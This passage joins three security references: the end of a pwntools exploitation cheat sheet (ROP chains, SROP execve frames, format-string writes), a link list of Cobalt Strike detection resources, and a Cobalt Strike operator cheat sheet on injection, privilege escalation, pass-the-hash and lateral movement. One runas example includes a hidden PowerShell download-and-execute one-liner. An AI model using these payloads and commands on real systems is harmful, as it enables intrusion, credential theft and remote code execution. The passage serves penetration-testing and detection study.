syscall = rop.find_gadget(['syscall', 'ret']).address
# another alternative for simple `pop reg; ret` gadgets
pop_rdi = rop.rdi.address
pop_rsi = rop.rsi.address
```
```py
pop_rax = 0xdeadbeef
syscall = 0xcafebabe
# the below is equivalent to `p64(pop_rax) + p64(59) + p64(syscall)`,
# when converted to bytes
rop.raw(pop_rax)
rop.raw(59)
rop.raw(syscall)
```
```py
rop.call(elf.sym.puts, [0xdeadbeef])
# the above `call` function is equivalent to
rop.raw(rop.rdi.address) # pop rdi; ret
rop.raw(0xdeadbeef)
rop.raw(elf.sym.puts)
```
```py
# rop chains can also be built on top of libc, rather than your
# target binary
libc = ELF('./libc.so.6')
libc.address = 0xdeadbeef # setting the base address of libc
bin_sh = next(libc.search(b'/bin/sh'))
# note that this rop chain will use gadgets found in libc
rop = ROP(libc)
# you can also directly call elf symbols (if they're available in)
# the elf) instead of using pwntools' `call` function
rop.setreuid(0, 0) # equivalent to rop.call(libc.setreuid, [0, 0])
rop.system(bin_sh) # equivalent to rop.call(libc.system, [bin_sh])
```
```py
# converting the rop chain to bytes in order to send it as
# a payload
payload = rop.chain()
```
```py
# printing the rop chain generated by pwn tools
print(rop.dump())
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="srop-and-sigreturn-frames"></a>
## 8. SROP and Sigreturn Frames
```py
# address of a syscall instruction
syscall = 0xdeadbeef
# address of a "/bin/sh" string
bin_sh = 0xcafebabe
# instatiating a sigreturn frame object
frame = SigreturnFrame()
# setting values of registers (set rip as address to return to)
frame.rax = constants.SYS_execve
frame.rdi = bin_sh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall
```
```py
# the sigreturn frame will need to be converted to bytes prior
# to being sent as part of a payload
payload = bytes(frame)
```
[^ Back to top](#file-pwntools-cheatsheet-md)
<a name="format-string-exploits"></a>
## 9. Format String Exploits
```py
# the format string offset
offset = 5
# the writes you want to perform
writes = {
0x40010: 0xdeadbeef, # write 0xdeadbeef at 0x40010
0x40018: 0xcafebabe # write 0xcafebabe at 0x40018
}
# you can use the `fmtstr_payload` function to automatically
# generate a payload that performs the writes you specify
payload = fmtstr_payload(offset, writes)
p.writeline(payload)
```
```py
# if data is written by the vulnerable function at the start of
# your payload, you can specify the number of bytes written
payload = fmtstr_payload(offset, writes, numbwritten=8)
p.writeline(payload)
```
```py
p = process('./target')
# you will need to define a function that sends your payload to
# the target, and returns the value output by the target
def send_data(payload):
p.sendline(payload)
return p.readall()
# automatic calculation of the format string offset
fmt_str = FmtStr(execute_fmt=send_data)
offset = fmt_str.offset
```
```py
# you can also use the `FmtStr` object to perform your writes
fmt_str = FmtStr(execute_fmt=send_data)
fmt_str.write(0x40010, 0xdeadbeef) # write 0xdeadbeef at 0x40010
fmt_str.write(0x40018, 0xcafebabe) # write 0xcafebabe at 0x40018
fmt_str.execute_writes()
```
# Awesome-CobaltStrike-Resources
<strong>Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors". Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz. <strong>
Cobalt Strike MITRE TTPs </br>
https://attack.mitre.org/software/S0154/
Cobalt Strike MITRE ATT&CK Navigator </br>
https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0154%2FS0154-enterprise-layer.json
<h2>Hunting & Detection Tools</br></h2>
Hunt-Sleeping-Beacons</br>
https://github.com/thefLink/Hunt-Sleeping-Beacons
Pointer - Cobalt Strike Hunting</br>
https://github.com/shabarkin/pointer
BeaconEye</br>
https://github.com/CCob/BeaconEye
Beacon Hunter</br>
https://github.com/3lp4tr0n/BeaconHunter
Cobalt Spam</br>
https://github.com/hariomenkel/CobaltSpam
Cobalt Strike Team Server Password Brute Forcer </br>
https://github.com/isafe/cobaltstrike_brute
CobaltStrikeScan Scan files or process memory for Cobalt Strike beacons and parse their configuration </br>
https://github.com/Apr4h/CobaltStrikeScan
Cobalt Strike beacon scan </br>
https://github.com/whickey-r7/grab_beacon_config
Cobalt Strike decrypt</br>
https://github.com/WBGlIl/CS_Decrypt
Detecting CobaltStrike for Volatility<br>
https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py
JARM fingerprints scanner </br>
https://github.com/salesforce/jarm
Cobalt Strike Forensic</br>
https://github.com/RomanEmelyanov/CobaltStrikeForensic
Cobalt Strike resources</br>
https://github.com/Te-k/cobaltstrike
List of C2 JARM including Cobalt Strike</br>
https://github.com/cedowens/C2-JARM
SilasCutler_JARM_Scan_CobaltStrike_Beacon_Config.json </br>
https://pastebin.com/DzsPgH9w
Detection Cobalt Strike stomp</br>
https://github.com/slaeryan/DetectCobaltStomp
Cobalt Strike Built-In Lateral Movement Capabilities Based On CONTI Leak Mind Map
https://github.com/AndrewRathbun/DFIRMindMaps/tree/main/OSArtifacts/Windows/Cobalt%20Strike%20Lateral%20Movement%20Artifact%20-%20Based%20on%20CONTI%20Leak
ThreatHunting Jupyter Notebooks - Notes on Detecting Cobalt Strike Activity</br>
https://github.com/BinaryDefense/ThreatHuntingJupyterNotebooks/blob/main/Cobalt-Strike-detection-notes.md
Random C2 Profile Generator</br>
https://github.com/threatexpress/random_c2_profile
Python parser for CobaltStrike Beacon's configuration</br>
https://github.com/Sentinel-One/CobaltStrikeParser
<h2>Yara rules</br></h2>
Cobalt Strike Yara</br>
https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar</br>
https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike_evasive.yar</br>
https://github.com/Te-k/cobaltstrike/blob/master/rules.yar
<h2>Sigma rules</br></h2>
Cobalt Strike sigma rules</br>
Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner.</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/create_remote_thread/sysmon_cobaltstrike_process_injection.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry_event/sysmon_cobaltstrike_service_installs.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/network/net_mal_dns_cobaltstrike.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/process_creation_cobaltstrike_load_by_rundll32.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_rundll32_no_params.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_cobaltstrike_process_patterns.yml</br>
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/sysmon_susp_clr_logs.yml</br>
(check in the future for updates or new rules)
<h2>Indicators of compromise</br></h2>
Cobalt Strike hashes</br>
https://bazaar.abuse.ch/browse/yara/CobaltStrike/
https://bazaar.abuse.ch/browse/tag/CobaltStrike/
https://bazaar.abuse.ch/browse/tag/CobaltStrike%20beacon%20implant%20Zoom%20Meetings/
https://tria.ge/s?q=family%3Acobaltstrike
Possible Cobalt Strike Stager IOCs</br>
https://pastebin.com/54zE6cSj
List of Cobalt Strike servers
https://docs.google.com/spreadsheets/d/1bYvBh6NkNYGstfQWnT5n7cSxdhjSn1mduX8cziWSGrw/edit#gid=766378683
Possible Cobalt Strike ioc's</br>
https://pastebin.com/u/cobaltstrikemonitor
Cobalt Strike Trevor Profiles</br>
https://pastebin.com/yB6RJ63F
https://pastebin.com/7QnLN5u0
Cobalt Strike & Metasploit servers</br>
https://gist.github.com/MichaelKoczwara</br>
ThreatFox Database(Cobalt Strike)by abuse.ch</br>
https://threatfox.abuse.ch/browse/malware/win.cobalt_strike/
<h2>Hunting & Detection Research Articles</br></h2>
Cobalt Strike as a Threat to Healthcare from U.S. Department of Health & Human Services - Health Sector Cybersecurity Coordination Center (HC3)</br>
https://www.hhs.gov/sites/default/files/cobalt-strike-tlpwhite.pdf
Detecting Conti Cobalt Strike Lateral Movement Techniques Part 1</br>
https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1
Detecting Conti Cobalt Strike Lateral Movement Techniques Part 2</br>
https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2
CobaltStrike Beacon Config Parsing with CyberChef — Malware Mondays #2</br>
https://medium.com/@whickey000/cobaltstrike-beacon-config-parsing-with-cyberchef-malware-mondays-2-86d759b9a031
Cobalt Strike Hunting – Key items to look for<br>
https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/
Identify malicious servers / Cobalt Strike servers with JARM</br>
https://www.vanimpe.eu/2021/09/14/identify-malicious-servers-cobalt-strike-servers-with-jarm/
Full-Spectrum Cobalt Strike Detection</br>
https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf
Cobalt Strike, a Defender’s Guide</br>
https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
Cobalt Strike, a Defender’s Guide – Part 2</br>
https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/
BazarCall to Conti Ransomware via Trickbot and Cobalt Strike</br>
https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/
Cobalt Strike and Tradecraft</br>
https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/
Analysing Cobalt Strike for fun and profit</br>
https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
Cobalt Strike Remote Threads detection</br>
https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
https://github.com/Neo23x0/sigma/blob/master/rules/windows/sysmon/sysmon_cobaltstrike_process_injection.yml
The art and science of detecting Cobalt Strike</br>
https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf
Detecting Cobalt Strike Default Modules via Named Pipe Analysis</br>
https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/
A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers</br>
https://go.recordedfuture.com/hubfs/reports/cta-2019-0618.pdf
How to detect Cobalt Strike activities in memory forensics</br>
https://www.andreafortuna.org/2020/11/22/how-to-detect-cobalt-strike-activity-in-memory-forensics/
Detecting Cobalt Strike by Fingerprinting Imageload Events</br>
https://redhead0ntherun.medium.com/detecting-cobalt-strike-by-fingerprinting-imageload-events-6c932185d67c
The Anatomy of an APT Attack and CobaltStrike Beacon’s Encoded Configuration </br>
https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/
CobaltStrike - beacon.dll : Your No Ordinary MZ Header</br>
https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html
GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic</br>
https://www.bleepingcomputer.com/news/security/github-hosted-malware-calculates-cobalt-strike-payload-from-imgur-pic/
Detecting Cobalt Strike beacons in NetFlow data</br>
https://delaat.net/rp/2019-2020/p29/report.pdf
Volatility Plugin for Detecting Cobalt Strike Beacon</br>
https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html
Easily Identify Malicious Servers on the Internet with JARM</br>
https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a
Cobalt Strike Beacon Analysis</br>
https://isc.sans.edu/forums/diary/Quick+Tip+Cobalt+Strike+Beacon+Analysis/26818/
Hancitor infection with Pony, Evil Pony, Ursnif, and Cobalt Strike</br>
https://isc.sans.edu/forums/diary/Hancitor+infection+with+Pony+Evil+Pony+Ursnif+and+Cobalt+Strike/25532/
Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike</br>
https://isc.sans.edu/forums/diary/Attackers+Exploiting+WebLogic+Servers+via+CVE202014882+to+install+Cobalt+Strike/26752/
Hiding in the Cloud: Cobalt Strike Beacon C2 using Amazon APIs</br>
https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/
Identifying Cobalt Strike team servers in the wild</br>
https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/
Multi-stage APT attack drops Cobalt Strike using Malleable C2 feature</br>
https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/
Operation Cobalt Kitty</br>
http://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf
Detecting and Advancing In-Memory .NET Tradecraft</br>
https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/
Analysing Fileless Malware: Cobalt Strike Beacon</br>
https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/ </br>
CobaltStrike samples pass=infected</br>
https://www.dropbox.com/s/o5493msqarg3iyu/Cobalt%20Strike.7z?dl=0
IndigoDrop spreads via military-themed lures to deliver Cobalt Strike</br>
https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html
Cobalt Group Returns To Kazakhstan</br>
https://research.checkpoint.com/2019/cobalt-group-returns-to-kazakhstan/
Striking Back at Retired Cobalt Strike: A look at a legacy vulnerability</br>
https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/
Azure Sentinel Quick-Deploy with Cyb3rWard0g’s Sentinel To-Go – Let’s Catch Cobalt Strike! </br>
https://www.blackhillsinfosec.com/azure-sentinel-quick-deploy-with-cyb3rward0gs-sentinel-to-go-lets-catch-cobalt-strike/
Cobalt Strike stagers used by FIN6</br>
https://malwarelab.eu/posts/fin6-cobalt-strike/
Malleable C2 Profiles and You</br>
https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929</br>
List of spawns from exposed Cobalt Strike C2</br>
https://gist.github.com/MHaggis/bdcd0e6d5c727e5b297a3e69e6c52286
C2 Traffic patterns including Cobalt Strike</br>
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
CobaltStrike Threat Hunting via named Pipes</br>
https://www.linkedin.com/feed/update/urn:li:activity:6763777992985518081/
Hunting for GetSystem in offensive security tools</br>
https://redcanary.com/blog/getsystem-offsec/
Hunting and Detecting Cobalt Strike</br>
https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
Detecting Cobalt Strike with memory signatures</br>
https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures
How to detect CobaltStrike Command & Control communication</br>
https://underdefense.com/how-to-detect-cobaltstrike-command-control-communication/
Red Canary Threat Detection Report 2021 - Cobalt Strike</br>
https://redcanary.com/threat-detection-report/threats/cobalt-strike/
Detecting Exposed Cobalt Strike DNS Redirectors</br>
https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors/
Decoding Cobalt Strike Traffic</br>
https://isc.sans.edu/diary/27322
Anatomy of Cobalt Strike’s DLL Stager</br>
https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/
malleable_c2_profiles</br>
https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
pipes</br>
https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752#gistcomment-3624664
spawnto</br>
https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752#gistcomment-3624663
Enterprise Scale Threat Hunting: C2 Beacon Detection with Unsupervised ML and KQL</br>
Part 1</br>
https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f<br>
Part 2</br>
https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e
Detecting network beacons via KQL using simple spread stats functions<br>
https://ateixei.medium.com/detecting-network-beacons-via-kql-using-simple-spread-stats-functions-c2f031b0736b
Cobalt Strike Hunting — simple PCAP and Beacon Analysis</br>
https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811
Guide to Named Pipes and Hunting for Cobalt Strike Pipes</br>
https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
Detecting C&C Malleable Profiles</br>
https://community.rsa.com/t5/netwitness-blog/detecting-c-amp-c-malleable-profiles/ba-p/607072
FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets</br>
The report itself is not about Cobalt Strike, but FIN12 makes heavy use of the CS. We have a whole section about it in the report: "Cobalt Strike / BEACON TTPs"</br>
https://www.mandiant.com/media/12596/download
Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis</br>
https://www.mandiant.com/resources/defining-cobalt-strike-components
Cobalt Strike: Using Known Private Keys To Decrypt Traffic</br>
https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/ (part 1)
https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/ (part 2)
Cobalt Strike: Using Process Memory To Decrypt Traffic</br>
https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/
Cobalt Strike: Decrypting Obfuscated Traffic</br>
https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/
Cobalt Strike: Decrypting DNS Traffic</br>
https://blog.nviso.eu/2021/11/29/cobalt-strike-decrypting-dns-traffic-part-5/
Decrypting Cobalt Strike Traffic With Keys Extracted From Process Memory</br>
https://isc.sans.edu/diary/28006
Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence</br>
https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf
Collecting Cobalt Strike Beacons with the Elastic Stack</br>
https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/
Extracting Cobalt Strike Beacon Configurations</br>
https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/
<h2>Trainings </br></h2>
Attack detection fundamentals including also Cobalt Strike detection</br>
https://labs.f-secure.com/blog/attack-detection-fundamentals-initial-access-lab-1</br>
https://labs.f-secure.com/blog/attack-detection-fundamentals-initial-access-lab-2</br>
https://labs.f-secure.com/blog/attack-detection-fundamentals-initial-access-lab-3</br>
https://labs.f-secure.com/blog/attack-detection-fundamentals-initial-access-lab-4</br>
https://www.youtube.com/watch?v=DDK_hC90kR8&feature=youtu.beh</br>
Cobalt Strike Detection via Log Analysis Workshop</br>
https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395/
<h2>Videos</br></h2>
Malleable Memory Indicators with Cobalt Strike's Beacon Payload</br>
https://www.youtube.com/watch?v=93GyP-mEUAw&feature=emb_title
STAR Webcast: Spooky RYUKy: The Return of UNC1878</br>
https://www.youtube.com/watch?v=BhjQ6zsCVSc
Excel 4.0 Macros Analysis - Cobalt Strike Shellcode Injection</br>
https://www.youtube.com/watch?v=XnN_UWfHlNM
Profiling And Detecting All Things SSL With JA3<br>
https://www.youtube.com/watch?v=oprPu7UIEuk
Hunting beacons by Bartosz Jerzman (x33fcon conf)<br>
https://www.youtube.com/watch?v=QrSTnVlOIIA
Striking Back: Hunting Cobalt Strike Using Sysmon And Sentinel by Randy Pargman<br>
https://www.binarydefense.com/striking-back-hunting-cobalt-strike-using-sysmon-and-sentinel-thank-you/?submissionGuid=5719f087-bfa5-4261-8b77-34541d8736d6
Making Sense Of Encrypted Cobalt Strike Traffic<br>
https://isc.sans.edu/diary/27448
Cobalt Strike Threat Hunting | SANS DFIR Summit 2021 | Chad Tilbury</br>
https://www.youtube.com/watch?v=borfuQGrB8g
SiegeCast "COBALT STRIKE BASICS" with Tim Medin and Joe Vest</br>
https://www.youtube.com/watch?v=OtM6iegGYAQ
Decrypting Cobalt Strike Traffic With Keys Extracted From Process Memory by Didier Stevens</br>
https://isc.sans.edu/diary/28008
Mining The Shadows with ZoidbergStrike: A Scanner for Cobalt Strike</br>
https://www.youtube.com/watch?v=MWr6bvrrYHQ
# Cobalt Strike CheatSheet
General notes and advices for cobalt strike C2 framework.
## Summary
- [Cobalt Strike CheatSheet](#cobalt-strike-notes)
- [Summary](#summary)
- [Basic Menu Explanation](#basic-menu-explanation)
- [Listeners](#listeners)
- [Malleable C2 Profiles](#malleable-c2-profiles)
- [Aggressor Scripts](#aggressor-scripts)
- [Common Commands](#common-commands)
- [Exploitation](#exploitation)
- [Privilege Escalation](#privilege-escalation)
- [Pivoting](#pivoting)
- [Lateral Movement](#lateral-movement)
- [Exflitration](#exflitration)
- [Miscellaneous](#miscellaneous)
- [OPSEC Notes](#opsec-notes)
## Basic Menu Explanation
- **Cobalt Strike:** The first and most basic menu, it contains the functionality for connecting to a team server, set your preferences, change the view of beacon sessions, manage listeners and aggressor scripts.
- **View:** The view menu consists of elements that manages targets, logs, harvested credentials, screenshots, keystrokes etc. The main purpose of it is to provide an easy way to access the output of many modules, manage your loots and domain targets.
- **Attacks:** This menu contains numerous client side attack generating methods like phishing mails, website cloning and file hosting. Also provides numerous ways to generate your beacon payloads or just generate shellcode and save it for later use on another obfuscation tool.
- **Reporting:** It provides an easy way to generate pdf or spreadsheet files containing information about the execution of an attack, this way it assists you on organizing small reports, making the final report writing process easier.
- **Help:** Basic help menu of the tool.
## Listeners
### Egress Listeners
- **HTTP/HTTPS:** The most basic payloads for beacon, by default the listeners will listen on ports 80 and 443 with always the option to set custom ports. You have the options to set proxy settings, customize the HTTP header or specify a bind port to redirect beacon's traffic if the infrastructure uses redirector servers for the payload callbacks.
- **DNS:** A very stealthy payload options, provides stealthier traffic over the dns protocol, you need to specify the DNS server to connect to. The best situation to use this type of listener is in a really locked down environment that blocks even common traffic like port 80 and 443.
### Pivot Listeners
- **TCP:** A basic tcp listener that bound on a spesific port.
- **SMB:** An amazing option for internal spread and lateral move, this payload uses named pipes over the smb protocol and is the best approach to bypass firewalls when even default ports like 80 and 443 are black listed.
### Miscellaneous Listeners
- **Foreign HTTP/HTTPS:** These type of listeners give us the option to pass a session from the metasploit framework to cobalt strike using either http or https payloads. A useful example is to execute an exploit module from metasploit and gain a beacon session on cobalt strike.
- **External C2:** This is a special type of listener that gives the option to 3rd party applications to act as a communication medium for beacon.
## Malleable C2 Profiles
In simple words a malleable c2 profile is a configuration file that defines how beacon will communicate and behave when executes modules, spawns processes and threads, injects dlls or touches disk and memory. Not only that, but it configures how the payload's traffic will look like on a pcap, the communication interval and jitter etc.
The big advantage of custom malleable c2 profiles, is that we can configure and customize our payload to match our situation and target environment, that way we make our selves more stealthy as we can blend with the environment's traffic.
## Aggressor Scripts
Aggressor Script is the scripting language built into Cobalt Strike, version 3.0, and later. Aggresor Script allows you to modify and extend the Cobalt Strike client. These scripts can add additional functions on existing modules or create new ones. \
[Aggressor Script Tutorial](https://download.cobaltstrike.com/aggressor-script/index.html)
## Common Commands
- **help:** Listing of the available commands.
- **help \<module>:** Show the help menu of the selected module.
- **jobs:** List the running jobs of beacon.
- **jobkill \<id>:** Kill selected job.
- **run:** Execute OS commands using Win32 API calls.
- **shell:** Execute OS commands by spawning "cmd.exe /c".
- **powershell:** Execute commands by spawning "powershell.exe"
- **powershell-import:** Import a local powershell module in the current beacon process.
- **powerpick:** Execute powershell commands without spawning "powershell.exe", using only .net libraries and assemblies. (Bypasses AMSI and CLM)
- **drives:** List current system drives.
- **getuid:** Get current user uid.
- **sleep:** Set the interval and jitter of beacon's call back.
- **sleep Usage:**
```
sleep [time in seconds] [jitter]
```
i.e.
```
sleep 5 60
sleep 120 40
...
```
- **ps:** Listing processes.
- **cd:** Change directory.
- **cp:** Copy a local file on another local location.
- **download/upload:** Download a file and upload a local file.
- **download/upload Usage:**
```
download C:\Users\victim\Documents\passwords.csv
upload C:\Users\S1ckB0y1337\NotMalware\youvebeenhacked.txt
```
- **cancel:** Cancel a file download.
- **reg:** Query Registry.
## Exploitation
- **browserpivot:** Will hijack a web session of internet explorer and make possible for us to browse the web as the victim's browser, including it's sessions, cookies and saved passwords.
- **dcsync:** Perform the DCsync attack using mimikatz.
- **dcsync Usage:**
```
dcsync [DOMAIN.fqdn] [DOMAIN\user]
```
i.e.
```
dcsync CORP.local CORP\steve.johnson
```
- **desktop:** Inject a VNC server on the beacon process and get a remote desktop view of the target.
- **desktop Usage:**
```
desktop [pid] [x86|x64] [high|low]
```
i.e.
```
desktop 592 x64 high
desktop 8841 x86 low
```
:exclamation: The high/low arguments specify the quality of the session.
- **dllinject/dllload:** Inject a reflective dll into a process/Load a dll on current process.
- **execute-assembly:** Loads and executes a .NET compiled assembly executable completely on memory.
- **execute-assembly Usage:**
```
execute-assembly [/path/to/local/.NET] [arguments]
```
- **inject:** Inject a beacon payload on a specified process and spawn a new beacon session under it's security context.
- **inject Usage:**
```
inject [pid] [x86|x64] [listener]
```
i.e.
```
inject 9942 x64 Lab-SMB
inject 429 x86 Lab-HTTPS
...
```
- **kerberos\*:** Manipulate kerberos tickets.
- **ppid:** Spoofs the parent process of beacon for any post-exploitation child spawning job. That way we can hide our malicious post-exploitation jobs.
- **psinject:** Inject on a specified process and execute a command using powerpick's functionality. \
:notebook: Powershell modules imported with **powershell-import** are available.
- **runu:** Run a command under a spoofed process PID.
- **shinject:** Inject shellcode into another a running process.
- **shspawn:** Create a new process and inject shellcode into it.
- **shspawn Usage:**
```
shspawn [x86|x64] [/path/to/my.bin]
```
i.e.
```
shspawn x64 /opt/shellcode/malicious.bin
```
## Privilege Escalation
- **elevate:** Contains numerous ways to escalate your privileges to Administrator or SYSTEM using kernel exploits and UAC bypasses.
- **elevate Usage:**
```
elevate [exploit] [listener]
```
i.e.
```
elevate juicypotato Lab-SMB
elevate ms16-032 Lab-HTTPS
...
```
- **getsystem:** Attempts to impersonate system, if it fails we can use steal_token to steal a token from a process that runs as SYSTEM.
- **getprivs:** Same as metasploit's function, enables all the available privileges on the current token.
- **runasadmin:** Attempts to run a command on an elevated context of Administrator or SYSTEM using a local kernel or UAC bypass exploit. The difference with elevate is that it doesnt spawn a new beacon, but executes a specified application of our choice under the new context.
- **runasadmin Usage:**
```
runasadmin [exploit] [command] [args]
```
i.e.
```
runasadmin uac-token-duplication [command]
runasadmin uac-cmstplua [command]
```
## Pivoting
- **socks:** Start a socks4a proxy server and listen on a specified port. Access through the proxy server can achieved using a proxy client like proxychains or redsocks.
- **socks Usage:**
```
socks [port]
```
i.e.
```
socks 9050
```
:exclamation: This requires your /etc/proxychains.conf to be configured to match the port specified. If operating on Windows, your proxychains.conf file may be located in %USERPROFILE%\.proxychains\proxychains.conf, (SYSCONFDIR)/proxychains.conf, or (Global programdata dir)\Proxychains\proxychains.conf.
- **covertvpn:** Deploy a VPN on the current system, will create a new interface and merge it into a specified IP. Using this we can use a local interface to access the internal target network like we would do if we had a real connection through a router.
## Lateral Movement
- **portscan:** Performs a portscan on a spesific target.
- **portscan Usage:**
```
portscan [ip or ip range] [ports]
```
i.e.
```
portscan 172.16.48.0/24 1-2048,3000,8080
```
The above command will scan the entire 172.16.48.0/24 subnet on ports 1 to 2048, 3000 and 8080. This can be utilized for single IPs as well.
- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
- **runas Usage:**
```
runas [DOMAIN\user] [password] [command] [arguments]
```
i.e.
```
runas CORP\Administrator securePassword12! Powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.50.90:80/filename'))"
```
- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
:exclamation: This module needs Administrator privileges.
- **pth Usage:**
```
pth [DOMAIN\user] [hash]
```
```
pth Administrator 97fc053bc0b23588798277b22540c40d
pth CORP\Administrator 97fc053bc0b23588798277b22540c40d
```
- **steal_token:** Steal a token from a specified process.
- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
- **jump Usage:**
```
jump [psexec64,psexec,psexec_psh,winrm64,winrm] [server/workstation] [listener]
```
i.e.
```
jump psexec64 DC01 Lab-HTTPS
jump winrm WS04 Lab-SMB
jump psexec_psh WS01 Lab-DNS
...
```
- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
- **remote-exec Usage:**
```
